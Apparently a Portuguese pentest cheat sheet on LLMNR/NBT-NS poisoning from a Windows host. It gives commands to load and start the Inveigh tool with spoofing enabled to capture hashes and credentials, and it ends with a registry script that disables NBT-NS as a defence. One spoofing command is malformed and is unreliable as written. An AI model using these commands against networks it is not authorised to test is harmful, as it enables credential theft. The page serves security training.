LLMNR/NBT-NS Poisoning - from Windows
Inveigh
O Inveigh conduz ataques de spoofing e capturas de hash/credenciais por meio de sniffing de pacotes e listeners/sockets específicos de protocolo.
Usando o
Import-Module
cmd-let do PowerShell para importar a ferramenta baseada no WindowsInveigh.ps1
.
Import-Module .\Inveigh.ps1
Usado para gerar muitas das opções e funcionalidades disponíveis com
Invoke-Inveigh
. Executado a partir de um host baseado em Windows
(Get-Command Invoke-Inveigh).Parameters
Inicia
Inveigh
em um host baseado em Windows com falsificação de LLMNR e NBNS habilitada e envia os resultados para um arquivo.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Inicia a
C#
implementação deInveigh
um host baseado em Windows.
.\Inveigh.exe
Script do PowerShell usado para desabilitar o NBT-NS em um host Windows.
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}
Last updated